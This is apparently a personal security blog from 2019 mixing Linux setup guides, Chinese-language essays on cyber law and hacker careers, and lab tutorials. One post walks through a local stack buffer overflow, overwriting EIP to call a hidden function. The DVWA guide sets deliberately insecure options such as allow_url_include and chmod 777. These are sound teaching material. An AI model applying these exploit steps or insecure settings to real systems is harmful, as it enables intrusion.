sudo pip3 install --extra-index-url https://developer.download.nvidia.com/compute/redist/jp/v42 tensorflow-gpu

sudo pip3 install -U keras


To test if it works or not :

python3

>>> import keras

If there is no error message and showing "Using TensorFlow backend.", it works. To quit it :

>>> quit()

If you want to create swap file, you may need to use this resources.

That's all! See you.





Monday, May 20, 2019

轉念反思 - 楊和生 (Sang Young)

凡事總有兩面。網絡世界有利用網絡犯罪的「黑帽黑客」,亦有保衛網絡的「白帽黑客」,兩者同時懂得黑客技術。但原來最大的技術不是技術層面上,而是捉摸人性心態。盲目瘋傳訊息往往助長黑客的氣焰,只要抱持懷疑態度,敢於質詢,不用特別技術,我們都可以終止一切謠言。



Thursday, May 16, 2019

HOWTO : Exploit Education - Phoenix on Kali Linux Rolling

apt install qemu-system

wget https://github.com/ExploitEducation/Phoenix/releases/download/v1.0.0-alpha-3/exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz

tar -xJvf exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz

cd exploit-education-phoenix-amd64

chmod +x boot-exploit-education-phoenix-amd64.sh


To run the virtual machine :

./boot-exploit-education-phoenix-amd64.sh

Open another terminal :

ssh -p 2222 user@localhost

The password is "user".

Inside the virtual machine, go to :

cd /opt/phoenix

You can choose either "amd64" or "i486" to do the Phoenix exploits.

cd /opt/phoenix/amd64

or

cd /opt/phoenix/i486

That's all! See you.


Thursday, May 09, 2019

Basic Buffer Overflow Exploit Make Easy



According to Wiki, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.

When buffer overflow occurs, attacker can run malicious code accordingly and may escalate the privilege as a result.

I introduce a very simple way to develop the buffer overflow exploit. No complicated procedure can be observed. The exploit development is running on 64-bit Kali Linux.

The following is the C source code of the "vuln.c" :



The "hacker" function is never be called from the program. Our aim is to run it as a result.

To compile the source to an executable :

gcc vuln.c -o vuln -fno-stack-protector -m32

If you cannot compiile to 32-bit, please install the following package :

apt install gcc-multilib

To make it simple, we disable the Address Space Layout Randomization (ASLR) :

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

In order to inspect the executable file, we need to download a tool namely "checksec.sh".

wget https://www.trapkit.de/tools/checksec.sh

Since the file is in Windows DOS format, we need to change it to be Unix format and executable :

dos2unix checksec.sh
chmod +x checksec.sh


Run the following command and you will find out that "NX" is enabled.

./checksec.sh --file vuln



To double check the file is compiled into 32-bit.

file vuln

vuln: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bc2907521e9842167e7544516653843949dabc9e, not stripped

When everything is alright, we run it to see how it works.

./vuln

What is your name?
samiux
Hey samiux, you're harmless, aren't you?

To see if we can crash it or not with 50 characters :

python -c 'print("A"*50)' > a.txt

cat a.txt | ./vuln

What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, you're harmless, aren't you?
Segmentation fault

Okay, it does crash. Now, we fire up the gdb to do the exploit development :

gdb ./vuln



Feed in the junk characters.

(gdb) r < a.txt



The program is crashed as expected.

We check with the registers to see what had happened.

(gdb) info registers



We noticed that the EIP is overwritten with "A". That means, we can control the EIP then. Once EIP can be controlled, we can run any code from that point. It is because EIP Instruction Pointer Register always contains the address of the next instruction to be executed.

Now, we need to find out how many junk characters to cause the crash. We use the "pattern_create.rb" to create a unique pattern.

Open another terminal and run :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50 > b.txt

We feed the unique pattern to the program.

(gdb) r < b.txt



The program is crashed again as expected.

We check the registers again and found out that EIP is overwritten with "0x41346241".

(gdb) info registers



We use the tool namely "pattern_offset.rb" to find out the offset. The offset is 42 for this case.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41346241
[*] Exact match at offset 42

According to the source code, we know that there are 3 functions, they are main, inSecure and hacker. Our aim here is to run hidden function "hacker". So, we need to find out the address of the function of hacker.

(gdb) info functions



(gdb) disass hacker



We find out that the address of function hacker is "0x565561b9".

Now, the payload will be as the following :

42's "A" and [the address of hacker function]

The PoC Python code "poc.py" :



Exploit it now :

python poc.py | ./vuln

What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�aUV, you're harmless, aren't you?
No, I'm a hacker!
Segmentation fault

The hidden hacker function is ran as a result.


Bonus

To find the EIP address :

python -c 'print("A"*42)+ "B"*4' > c.txt

(gdb) r < c.txt



(gdb) info registers



(gdb) x/50xw $esp -100



The EIP address is 0xffffd32c.


Samiux
OSCE OSCP OSWP
May 9, 2019, Hong Kong, China

Wednesday, May 08, 2019

Exploit Education - Phoenix (Stack Overflows)

Exploit Education is formerly Exploit Exercise. They have a series of exploit exercises. The new release is Phoenix which covers the following topics :

- Network programming
- Stack overflows
- Format string vulnerabilities
- Heap overflows

I do the Stack overflows (i486) section recently. However, I cannot solve Stack-Six as it is too difficult for me at the moment.

You can download the virtual machine at here. The current image is v1.0.0-alpha-3 and released on 16th January 2019.

For not being a spoiler, the exploit codes are not shown in the video.



That's all! See you.


Thursday, May 02, 2019

VulnHub - Stack Overflows for Beginners 1

Stack Overflows for Beginners 1 is created by Jack Barradell-Johns who is a university student of University of Sheffield. He developed this box for Ethical Hacking Society of the university.

There are 5 flags (including root flag) to capture that are based on basic stack buffer overflow. The box is built on Kali Linux and is about 8 GB to download.

The first level is level0 and the username and password are both "level0".


To avoid for being spoiler, the flags and exploit codes are not shown in the video.




Samiux
OSCE OSCP OSWP
May 2, 2019 Hong Kong, China


Wednesday, April 24, 2019

HUAWEI MateBook X Pro on Ubuntu Desktop 18.04.2 LTS

CPU - Intel Core i7-8550U
RAM - 16GB LPDDR3
SSD - 512GB NVMe PCIe SSD
Thunderbolt 3 - USB Type C
Display - 13.9 inches LTPS Touchscreen (3,000 x 2,000) (260 PPI)
Graphic - nVidia M150 and Intel HD Graphic on CPU
F2 key - UEFI BIOS
F12 key - Boot list

This is 2018 model. The 2019 (HUAWEI MateBook X Pro New) is not available here at the moment.

If you want to, you need to update BIOS on Windows 10 environment before installing Ubuntu. To update it, just download the driver and install the ".INF".

You can install Ubuntu Desktop 18.04.2 LTS on HUAWEI MateBook X Pro without any problem no matter "Secure Boot" is enable or not. However, it cannot be shutdown or reboot properly unless you installed nVidia display driver on it.

Make sure the "Problem Reporting" is set to "Automatic" at "Privacy" of "Settings" under the top right hand conner.

Meanwhile, you may need to install "net-tools" for seeing the settings of the network interfaces.

sudo apt install net-tools

nVidia Display Driver

You can install the latest nVidia Open Source Display Driver version 418 on it via Ubuntu PPA. VirtualBox 6.0.6 guest VM requires newer version of nVidia display driver. I tested it with version 319 but the guest vm cannot be refreshed properly near the mouse pointer.

sudo add-apt-repository ppa:graphics-drivers/ppa
sudo apt-get update


(if you have older version of nVidia driver, delete it first)
sudo apt purge nvidia*

sudo apt install nvidia-driver-418 nvidia-settings


GNOME Extensions

GNOME Extensions are very useful. I recommend you to install the following for this laptop.

sudo apt chrome-gnome-shell gnome-tweak

Go to the "https://extensions.gnome.org/" to install extensions by clicking the "ON/OFF" button on the Extensions pages.

EasyScreenCast to record the screen in video format.

OpenWeather to see the current weather of your location.

CPUfreq to change the CPU between "powersave" or "performance" as well as "Turbo Boost".

VirtualBox Applet for easy access the VirtualBox virtual machines when VirtualBox is installed.

Extension Update Notifier to notifiy you about the update of Extensions.

Caffeine to disable and enable the screen saver.

Clipboard Indicator to manage your copy and paste clipboard data.

Lock Keys to indicate the "Nums" and "CapLock" keys status.

Harddisk LED to display the activity of the hard drive/SSD.

That's all! See you.


Wednesday, March 20, 2019

中國香港網絡罪行硏究



中國香港對於網絡罪行的法例比較分散,它們分佈在電訊條例、刑事罪行條例和盜竊罪條例中。我嘗試以我有限的法律知識去硏究一下中國香港的網絡罪行的法例,這純粹是我個人的意見,並不代表香港政府和香港警務處的立場。

以下的硏究是假設在沒有受攻擊方的書面同意書或授權書下地進行。

掃描器

大多數國家及地方都視掃描活動為犯法。至於中國香港又如何呢?

掃描器 (Scanner) 大致有分漏洞掃描器 (Vulnerability Scanner) 和端口掃描器 (Port Scanner) 兩大類。漏洞掃描器又大致有分網絡漏洞掃描器 (Network Vulnerability Scanner) 及網站漏洞掃描器 (Web Application Vulnerability Scanner) 兩大類。在搜證方面,我個人認為端口掃描器的活動比較難搜集證據,而最容易的是網站漏洞掃描器;至於網絡漏洞掃描器就介乎兩者之間。

基於網站漏洞掃描器的活動有可能影響和干擾網站的正常運作,這就有可能觸犯刑事毀壞罪 (Criminal Damage)。而網絡漏洞掃描器活動的影響和干擾相對比較少,但因搜證也不難,所以漏洞掃描器活動亦都有可能觸犯刑事毀壞罪。至於端口掃描活動相對對目標機器的影響和干擾極之少,但並不代表端口掃描活動不犯法,只是搜證比較困難罷了。

阻斷服務或分佈式阻斷服務攻擊

阻斷服務 (Denial of Service, DoS) 和分佈式阻斷服務 (Distributed Denial of Service, DDoS) 攻擊非常明顯地影響和干擾目標機器的正常運作,而且搜證也不太難,所以這活動有可能觸犯了刑事毀壞罪。

域名非法跳轉和跨站腳本攻擊

當網域名稱系統 (Domain Name Service, DNS) 被脅持或網站的跨站腳本 (Cross Site Scripting, XSS) 漏洞被利用,網站可能會被這樣的活動而非接觸式地被改頭換面 (Defacing)。

這活動亦有可能觸犯了刑事毀壞罪或不誠實使用電腦罪 (Obtaining Access Computer with Criminal or Dishonest Intent),雖然在搜集證據上有一定的困難。

以上的例子在一般大眾是比較難理解的,所以在此列舉作出硏究,以免觸犯法律而不自知。所以掃描目標機器、阻斷服務攻擊和域名跳轉是有可能觸犯香港法例的。


Samiux
OSCE OSCP OSWP
二零一九年三月廿日,中國香港

参考資料

香港法例第二百章 刑事罪行條例 第五十九及六十節
香港法例第二百章 刑事罪行條例 第一六一節


Tuesday, March 19, 2019

中華人民共和國網絡安全法精選



二零一六年十一月七日通過,並於二零一七年六月一日施行的「中華人民共和國網絡安全法」(下稱「網絡安全法」),一共有七十九條,涵蓋範圍甚廣,由國家至人民,由商業到關鍵基礎設施,由我國至國際都有講述。

以下精選一些與我們 (人民) 有關的條例講述一下,從而了解「網絡安全法」要求網絡使用者的義務和責任。其餘的條文是有關網絡產品、服務提供者和關鍵基礎設施部門在「網絡安全法」的責任和義務,有關法例的理念和罰則亦有提及。以下條文是原文照錄。

第十二條 - 網絡活動參與者的權利和義務

國家保護公民、法人和其他組織依法使用網絡的權利,促進網絡接入普及,提升網絡服務水平,為社會提供安全、便利的網絡服務,保障網絡信息依法有序自由流動。

任何個人和組織使用網絡應當遵守憲法法律,遵守公共秩序,尊重社會公德,不得危害網絡安全,不得利用網絡從事危害國家安全、榮譽和利益,煽動顛覆國家政權、推翻社會主義制度,煽動分裂國家、破壞國家統一,宣揚恐怖主義、極端主義,宣揚民族仇恨、民族歧視, 傳播暴力、淫褻色情訊息,編造、 傳播虛假信息擾亂經濟秩序和社會秩序,以及侵害他人名譽、私隱、知識產權和其他合法權益等活動。

第二十條 - 網絡安全人才培養

國家支持企業和高等學校、職業學校等教育培訓機構開展網絡安全相關教育與培訓, 採取多種方式培養網絡安全人才,促進網絡安全人才交流。

第二十二條 - 網絡產品和服務提供者的安全義務

網絡產品、服務應當符合相關國家標準的強制性要求。網絡產品、服務的提供者不得設置惡意程序;發現其網絡產品、服務存在安全缺陷、漏洞等風險時,應當立即採取補救措施,按照規定及時告知用戶並向有關主管部門報告。

網絡產品、服務的提供者應當為其產品、服務持續提供安全維護;在規定或者當事人約定的期限內,不得終止提供安全維護。

網絡產品、服務具有收集用戶信息功能的,其提供者應向用戶明示並取得同意;涉及用戶個人信息的,還應遵守本法和有關法律、行政法規關於個人信息保護的規定。

第二十七條 - 禁止危害網絡安全的行為

任何個人和組織不得從事非法侵入他人網絡、干擾他人網絡正常功能、竊取網絡數據等危害網絡安全的活動;不得提供專門用於從事侵入網絡、干擾網絡正常功能及防護措施、竊取網絡數據等危害網絡安全活動的程序、工具;明知他人從事危害網絡安全的活動的,不得為其提供技術支持、廣告推廣、支持結算等幫助。

第二十八條 - 網絡運營者的技術支持和協助義務

網絡運營者應當為公安機關、國家安全機關依法維護國家安全和偵查犯罪的活動提供技術支持和協助。

第三十條 - 執法訊息用途限制

網信部門和有關部門在履行網絡安全保護職責中獲取的信息,只能用於維護網絡安全的需要,不得用於其他用途。

第四十一條 - 個人信息收集使用規則

網絡運營者收集、使用個人信息,應當遵循合法、正當、必要的原則,公開收集,使用規則,明示收集、使用信息的目的、方式和範圍,並經被收集者同意。

網絡運營者不得收集與其提供的服務無關的個信息,不得違反法律、行政法規的規定和雙方的約定收集、使用個人信息,並應當依照法律、行政法規的規定和與用戶的約定,處理其保存的個人信息。

第四十二條 - 網絡運營者的個人信息保護義務

網絡運營者不得洩露、篡改、毀損其收集的個人信息;未經被收集者同意,不得向他人提供個人信息。但是,經過處理無法識別特定個人且不能復原的除外。

網絡運營者應當採取技術措施和其他必要措施,確保其收集的個人信息安全,防止信息洩露、毀損、掉失。在發生或者可能發生個人信息洩露、損毀、掉失的情況時,應當立即採取補救措施,按照規定及時告知用戶並向有關主管部門報告。

第四十六條 - 禁止利用網絡從事與違法犯罪相關的活動

任何個人和組織應當對其使用網絡的行為負責,不得設立用於實施詐騙,傳授犯罪方法,制作或者銷售違禁物品、管制物品等違法犯罪活動的網站、通訊群組,不得利用網絡發佈涉及實施詐騙,制作或者銷售違禁物品、管制物品及其他違法犯罪活動的信息。

第四十七條 - 網絡運營者處理違法信息的義務

網絡運營者應當加強對其用戶發佈的信息的管理,發現法律、行政法規禁止發佈或者傳輸的信息的,應當立即停止傳輸該信息,採取消除等處置措施,防止信息擴散,保存有關記錄,並向有關主管部門報告。

第四十八條 - 電子信息和應用軟件的信息安全要求及其提供者處置違法信息的義務

任何個人和組織發送的電子信息、提供的應用軟件,不得設置惡意程序,不得含有法律、行政法規禁止發佈或者傳輸的信息。

電子信息發送服務提供者和應用軟件下載服務提供者,應當履行安全管理義務,知道其用戶有前款規定行為的,應當停止提供服務,採取消除等處置措施,保存有關記錄,並向有關主管部門報告。

第六十三、六十四、六十七、七十四及七十五條是講述有關罰則,這裡不便詳細描述。

「網絡安全法」涵蓋的範圍甚廣,包括個人信息收集處理,個人私隱處理,網絡犯罪等行為,以及網絡產品不可以有惡意程序等都有包含。可見此「網絡安全法」是非常文明和先進,而且撰寫此法例的人員具有高度的電腦知識。

本文只講述對我們人民息息相關的條文,至於其他條文請參閱「網絡安全法」。最後,本文是参考「中華人民共和國網絡安全法」實用版一書。


Samiux
OSCE OSCP OSWP
二零一九年三月十九日,中國香港

Tuesday, March 05, 2019

HOWTO : Install DVWA on Ubuntu 18.04.1 LTS

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


Step 1 :

sudo apt install php7.2 php7.2-gd php-mysql mysql-server apache2 git

Set the MySQL server password as prompt.

Step 2 :

sudo mysql -u root -p

CREATE DATABASE dvwadb;

GRANT ALL PRIVILEGES ON dvwadb.* TO ‘dvwa’@’localhost’ IDENTIFIED BY ‘dvwapassword’;


Step 3 :

sudo nano /etc/php/7.2/apache2/php.ini

Change the "Off" to "On" :

allow_url_include = On

Step 4 :

cd /var/www/html

sudo git clone https://github.com/ethicalhack3r/DVWA.git

cd /var/www/html/DVWA

sudo chmod 777 /var/www/html/DVWA/config
sudo chmod 666 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
sudo chmod 777 /var/www/html/DVWA/hackable/uploads/


Step 5 :

sudo nano /etc/apache2/sites-enabled/000-default.conf

Append "/DVWA" as the end of "/var/www/html" :

DocumentRoot /var/www/html/DVWA

Step 6 :

sudo cp /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php

sudo nano /var/www/html/DVWA/config/config.inc.php


Make changes as the following :

$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwadb';
$_DVWA[ 'db_user' ] = 'dvwa';
$_DVWA[ 'db_password' ] = 'dvwapassword';


Step 7 :

Go to https://www.google.com/recaptcha/admin to generate the keys for 'Insecure CAPTCHA' module and add to the related items at "config.inc.php".

Step 8 :

sudo systemctl restart apache2

Step 9 :

http://[server_ip_address]

The username is "admin" while the password is "password".

Beware that the DVWA is vulnerable and do not allow it to be accessed via public.

Step 10 (Optional) :

sudo apt install php7.2-fpm

sudo a2enmod proxy_fcgi setenvif
sudo a2enconf php7.2-fpm


That's all! See you.


Friday, February 15, 2019

HOWTO : Install docker-ce and nvidia-docker2 on Ubuntu 18.04.2 and Kali Linux 2019.1

docker-ce requires nvidia-docker2 on CUDA system.

Install nVidia driver :

On Ubuntu 18.04.2 :
HOWTO : Intel and nVidia GPUs on Ubuntu 18.04.1 LTS

On Kali Linux 2019.1 :
HOWTO : nVidia and HashCat on Kali Linux 2018.4

Uninstall docker.io (if any)

sudo apt remove docker docker-engine docker.io containerd runc docker-compose

Ready for docker-ce

On Ubuntu 18.04.2 :

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"

sudo apt update


On Kali Linux 2019.1 :

curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -

echo "deb [arch=amd64] https://download.docker.com/linux/debian stretch stable" > /etc/apt/sources.list.d/docker-ce.list

apt update


Ready for nvidia-docker2

On Ubuntu 18.04.2 :

curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add -

distribution=$(. /etc/os-release;echo $ID$VERSION_ID)

curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | sudo tee /etc/apt/sources.list.d/nvidia-docker.list

sudo apt update


On Kali Linux 2019.1 :

curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add -

curl -s -L https://nvidia.github.io/nvidia-docker/debian9/nvidia-docker.list | tee /etc/apt/sources.list.d/nvidia-docker.list

apt update


Install docker-ce and nvidia-docker2

apt-cache madison docker-ce
apt-cache madison nvidia-docker2


Find the most matched versions and the following settings are for my system at the time of this writing :

On Ubuntu 18.04.2 :

sudo apt install docker-ce=18.03.1-ce-0-debian docker-ce-cli=18.03.1-ce-0-debian containerd.io nvidia-docker2=2.0.3+docker18.03.1-1 nvidia-container-runtime=2.0.3+docker18.03.1-1

On Kali Linux 2019.1 :

apt install docker-ce=18.03.1-ce-0-debian docker-ce-cli=18.03.1-ce-0-debian containerd.io nvidia-docker2=2.0.3+docker18.03.1-1 nvidia-container-runtime=2.0.3+docker18.03.1-1

If the versions are not matched, the installation will be failed.

Install docker-compose

sudo apt install python3-pip
pip3 install docker-compose pip --ugrade


Configure docker-ce

sudo nano /etc/docker/daemon.json

Add the following in front of "runtimes": { :

"default-runtime": "nvidia",

sudo systemctl enable docker
sudo systemctl start docker


Basic usage

docker run --runtime=nvidia --rm nvidia/cuda nvidia-smi

Remark

Make sure the nvidia driver and CUDA versions in the host computer is equal or greater than the versions in docker containers. Otherwise, docker containers refuse to start.

That's all! See you.


Monday, February 11, 2019

Tensorflow Docker for Deep Learning Programming

Tensorflow is an open source machine learning framework for everyone. The Tensorflow Dockers are built for CPUs support SSE4.2, AVX2 and AVX512 feature which will use the full power of the CPU to train the model.

Features

- Tensorflow 1.12.0
- Ubuntu 18.04.x
- Python 3.6.x
- CPU with SSE4.2 (native docker)
- CPU with AVX2 (default docker)
- CPU with AVX512 (avx512 docker)

Tensorflow Docker is an Open Source Project which is released under GPLv3 License and it is developed by Samiux.

Reference

Tensorflow Docker for Deep Learning Programming

That's all! See you.


Friday, February 01, 2019

Kali Linux Lite Docker For Lightweight Pentesting

Offensive Security builds a Kali Linux base Docker image which do not have any tool on it. Meanwhile, there is no graphic interface (Display Manager) too.

Kali Linux Lite Docker is a bundle of scripts to generate Docker image for lightweight pentesting purpose. Not all the tools available in Kali Linux are on the generated image. If so, it takes more that 20GB spaces and it breaks the policy of the Docker - microservices. The image is trying to keep it as small as possible. The Kali Linux Lite Docker image can be ran on Linux, Windows and MacOSX without any problem. The scripts are released under GPLv3 by Samiux.

The script will generate an image of around 4-5GB in size. This image include the following command line (text mode) tools :

(A) Scanners
- nmap, wpscan, dirb, masscan, unicornscan, netdiscover

(B) Exploitation
- metasploit-framework exploitdb sqlmap

(C) Debuggers and Compilers
- gdb gdb-doc, gdb-peda, build-essential

(D) Webshells and network tools
- net-tools, webshells, weevely

(E) CTF related
- steghide xxd


Source

Kali Linux Lite Docker For Lightweight Pentesting

Wednesday, January 16, 2019

HOWTO : Fix Ubuntu Cannot Reboot With Command Properly

When you have an UEFI BIOS on your computer and installed with Ubuntu, you may encounter the computer cannot be reboot with command properly. We can fix it by the following method.

sudo nano /etc/default/grub

Locate the following line :

GRUB_CMDLINE_LINUX=""

and replaces it with :

GRUB_CMDLINE_LINUX="reboot=efi"

After that, run the following command and reboot with command :

sudo update-grub

sudo reboot


That's all! See you.


Tuesday, January 15, 2019

HOWTO : Fix Temporary Failure In Name Resolution On Ubuntu 18.04.1

If you are using Ubuntu 18.04.1 Server version, you may encounter a ping problem. That is, you can ping with IP address but cannot ping with domain name. We can fix this problem by the following method.

sudo mv /etc/resolv.conf /etc/resolv.conf-original
sudo ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf
sudo systemctl restart systemd-resolved


You can ping with domain name now.

That's all! See you.


Wednesday, January 09, 2019

如何成為黑客 (入門篇)


甚麼是黑客?

黑客 (Hacker) 一般是指技術精湛的人,能令設備做出一些不在設計情況之下運作。

在資訊科技安全領域下,黑客是指一個具有精湛電腦技術的人,能使電腦或其程式於不在其設計的情況下運作。在我等來說,黑客有分黑帽子 (Black Hat),白帽子 (White Hat),灰帽子 (Grey Hat) 及腳本小子 (Script Kiddies)。

黑帽子是指所謂駭客 (Cracker),他們是作奸犯科之流,但技術精湛。

白帽子是指資訊科技安全專家或硏究員,他們測試系統漏洞,並公報結果給有關開發人員或機構。

灰帽子也是資訊科技安全專家或硏究員,他們也測試系統漏洞,但他們大多數不會向有關開發人員或機構公報其發現,他們會直接披露 (Full Disclosure)。他們多數走在法律邊緣,但並沒有惡意。

至於腳本小子,他們並不是資訊科技界中人。他們會利用黑客工具作樂或者作惡。


為何要成為黑客?

無論你是作業系統開發員、應用系統開發員、程式設計員、系統管理員或者是普通的用戶,都需要學習黑客的知識和技術。當你明白黑客的攻擊是如何進行的話,你就會知道如何去防禦了。正所謂「未知攻,焉知防」。

再者,當完成編寫程式後,可以自行進行滲透測試 (Penetration Testing),以確保製成品沒有明顯的高危漏洞。


黑客的基本要求

黑客必須具有一定的英語水平,因為大多數的技術文獻都是用英語撰寫的。黑客也必須具有基本的編程能力,如 C、PHP 或 Python 等語言。除此之外,黑客也必須略懂網絡知識和技術。最後亦都是最重要的,黑客更必須具有創意的頭腦,思路不會被既有的框架所束縛。

當然,黑客要對各個版本的微軟視窗有所認識,這亦包括伺服器版本。除此之外,黑客亦會對 Linux、Unix (BSD 和 macOS 等) 有所了解。


學習與實習平台

網絡上有很多的實習的平台,有的是在綫上進行,有的是在綫下進行。有的需要付費的,但大多數都是免費的。以下是一些比較知名的平台:

(一) Hack The Box (綫上,付費或免費,要求有一定的基本能力方可注册);
(二) VulnHub (綫下,免費)。

網上有很多黑客技術的演練,大多是文章或視頻。比較知名的視頻為 IppSec 的 YouTube 視頻。

國內和國外有很多高質素的滲透測試書籍,我們可以從中可以學習到很多資訊科技安全的知識。網絡上也不乏高質素的資源可供存取。


認證與否?

如果你要在這個行業打滾的話,我建議考取一些認證。但如果你只是業餘又或者是賞金獵人 (Bug Bounty Hunter) 的話,有否認證並沒有必然關係。當然,如果有認證的話,在聲譽上就比較完美了。

比較知名的賞金獵人平台:

(一) HackerOne
(二) BugCrowd

至於認證方面,在中國香港可以考到的認證,而且在香港具有知名度的有:

(一) OSCP (在廿三小時四十五分內完成,是實戰型試題;在家裏應試,但會被監察);
(二) CEH (在四小時內完成,是選擇題試題);
(三) CEH (Practical) (在六小時內完成,是實戰型試題);
(四) CISSP (在三小時內完成,是選擇題試題)。

OSCP 和 CEH 是滲透測試的範疇,而 CISSP 是資訊科技安全管理的範疇。


結論

要成為黑客,我們需要多閱讀和多實踐,以確保認識和了解相關技術。但最重要的是不要觸犯法律,每個人都要對自己的行為負責。未經他人書面授權,不可以對他人作出滲透測試,否則將會噹啷入獄,前途盡毀。

Samiux
OSCE OSCP OSWP
寫於二零一九年一月九日,中國香港


Wednesday, January 02, 2019

HOWTO : Protect from being attacked by PMKID attack

On Aug 04, 2018, the developer of hashcat discovers a new way to attack WPA/WPA2 Wifi, namely PMKID attacks, when he is going to find a new way to attack new WPA3. This attack requires no Wifi user attached to the Wifi router and no need 4-way handshake. Meanwhile, almost all modern Wifi routers are vulnerable to this attack.

I conducted a quick test on my living area recently and found all Wifi routers (including mine) are vulnerable to this attack. If working with hashcat and/or good dictionaries properly, the WPA PSK (pre-Shared Key) password can be obtained without any problem.

Comes to the conclusion, WPA2 is no longer safe!

However, we can protect our Wifi by following methods :

(1) Make the WPA PSK password as complex and as long as possible (mine is 26 characters long);
(2) Make sure the WPA PSK password cannot be found in the available dictionaries (such as rockyou);
(3) Make sure your Wifi router can prevent ARP spoofing (Address Resolution Protocol) or apply MAC address filtering when possible;
(4) If possible, change your WPA PSK password at least once a month; and
(5) Keep your Wifi signal as weak as possible. Yes, makes it as weak as possible.

Reference

[1] New attack on WPA/WPA2 using PMKID
[2] Youtube PMKID attack Demo

That's all! See you.